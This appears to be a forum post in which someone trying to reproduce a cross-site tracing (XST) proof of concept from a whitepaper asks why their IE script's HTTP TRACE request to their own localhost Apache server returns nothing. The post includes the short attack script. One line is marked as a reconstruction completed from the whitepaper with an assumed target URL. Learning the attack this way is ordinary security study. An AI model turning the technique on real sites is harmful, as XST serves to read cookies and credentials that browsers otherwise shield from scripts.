I'm trying to recreate a proof of concept XST attack. (http://www.cgisecurity.com/whitehat-...per_screen.pdf)

Here is what I'm doing:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<script type="text/javascript">
function XST(){
	var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
	xmlHttp.open("TRACE", "http://localhost/", false); // post was cut off here; completed per the whitepaper PoC, target URL assumed
	xmlHttp.send();
	alert(xmlHttp.responseText);
}
</script>

This page is at localhost/XST.html, and I have an Apache server running. If I change TRACE to GET, the script works like it should (with a GET request); however, without that it won't return anything from the TRACE request. This is meant for IE, and it's not working. It's almost exactly the same as the PDF, so I'm guessing I'm overlooking some skiddie-proof intentionally inserted bug that's throwing this off.

Anyway, I understand how XST works, but this isn't working like the whitepaper says it should (unless it's my fault... must be my fault).